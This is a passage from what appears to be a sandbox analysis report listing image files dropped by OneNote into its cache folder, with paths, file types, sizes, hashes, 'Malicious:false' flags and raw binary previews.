                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
                                                                                                                                            MD5:7A450E086AD14BA7D89BA5DB3D3AE6C7
                                                                                                                                            SHA1:E7AEAFCFCE476390E18C19456BDF6529D863D518
                                                                                                                                            SHA-256:BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
                                                                                                                                            SHA-512:9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1|....[...jQ.%Zb.......t..........*..V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=*N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008V.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 60 x 336, 4-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):347
                                                                                                                                            Entropy (8bit):6.85024426015615
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
                                                                                                                                            MD5:78762C169F8B104CB57DFF5A1669D2DF
                                                                                                                                            SHA1:9638B71B584CD636834016A635ABF8D9C0887711
                                                                                                                                            SHA-256:E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
                                                                                                                                            SHA-512:5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000091.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 40 x 617, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):827
                                                                                                                                            Entropy (8bit):7.23139555596658
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
                                                                                                                                            MD5:3E675D61F588462FB452342B14BCF9C0
                                                                                                                                            SHA1:86B62019BC3C5BE48B654256B5D10293FC8C842A
                                                                                                                                            SHA-256:639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
                                                                                                                                            SHA-512:E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.|.._...7..D..Ya.l.....{.@&.|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000093.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 50 x 600, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4410
                                                                                                                                            Entropy (8bit):7.857636973514526
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
                                                                                                                                            MD5:2494381A1ACDC83843B912CFCDE5643B
                                                                                                                                            SHA1:98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
                                                                                                                                            SHA-256:5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
                                                                                                                                            SHA-512:0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}|..{'.U..~......}....s.............,CVu.x.:C..5...;.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000095.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):136726
                                                                                                                                            Entropy (8bit):7.973487854173386
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
                                                                                                                                            MD5:4A2472AC2A9434E35701362D1C56EDDF
                                                                                                                                            SHA1:16FA2EA2D2808D75445896E03B67A93000EEDDD8
                                                                                                                                            SHA-256:505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
                                                                                                                                            SHA-512:5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000097.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 77 x 627, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5136
                                                                                                                                            Entropy (8bit):7.622045262603241
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
                                                                                                                                            MD5:FA38AFA965141EA3F17863EE8DCCDE61
                                                                                                                                            SHA1:2B4611E651AF7549C1AA73932B1136B561A7602F
                                                                                                                                            SHA-256:E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
                                                                                                                                            SHA-512:A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000099.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):52945
                                                                                                                                            Entropy (8bit):7.6490972666456765
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                                                            MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                                                            SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                                                            SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                                                            SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009B.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):79656
                                                                                                                                            Entropy (8bit):7.966459570826366
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
                                                                                                                                            MD5:39FF3ACAE544EAC172B1269F825B9E9F
                                                                                                                                            SHA1:2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
                                                                                                                                            SHA-256:70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
                                                                                                                                            SHA-512:3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\.*.N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........|..4.wJ*..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009D.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40884
                                                                                                                                            Entropy (8bit):7.545929039957292
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                                                            MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                                                            SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                                                            SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                                                            SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009F.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):68633
                                                                                                                                            Entropy (8bit):7.709776384921022
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                                                            MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                                                            SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                                                            SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                                                            SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009H.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 176 x 513, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11043
                                                                                                                                            Entropy (8bit):7.96811228801767
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
                                                                                                                                            MD5:8E9AB9C28B155A66BC5C0DA5E2A4EFB5
                                                                                                                                            SHA1:972E61F162D48F1CEE21963ECBB2FE439105DB55
                                                                                                                                            SHA-256:B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
                                                                                                                                            SHA-512:12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.|.L.|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....|.)

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009J.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 40 x 650, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):647
                                                                                                                                            Entropy (8bit):6.854433034679255
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
                                                                                                                                            MD5:DD876AA103BEC3AC83C769D768AD39FB
                                                                                                                                            SHA1:1833603AA9B6A7E53F9AD8A336F96CCE33088234
                                                                                                                                            SHA-256:1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
                                                                                                                                            SHA-512:946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009L.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):52912
                                                                                                                                            Entropy (8bit):7.679147474806877
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
                                                                                                                                            MD5:1122BF4C2A42B4FA7F29D3C94954A7C9
                                                                                                                                            SHA1:3750077A830FE21735A43ABD35C63BA9A4D4B0DE
                                                                                                                                            SHA-256:423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
                                                                                                                                            SHA-512:4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=....*.......S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009N.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27862
                                                                                                                                            Entropy (8bit):7.238903610770013
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                                                            MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                                                            SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                                                            SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                                                            SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009P.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 50 x 556, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):977
                                                                                                                                            Entropy (8bit):7.231269197132181
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
                                                                                                                                            MD5:B7F74C18002A81A578A4EE60C407A8D3
                                                                                                                                            SHA1:70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
                                                                                                                                            SHA-256:95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
                                                                                                                                            SHA-512:13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009R.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
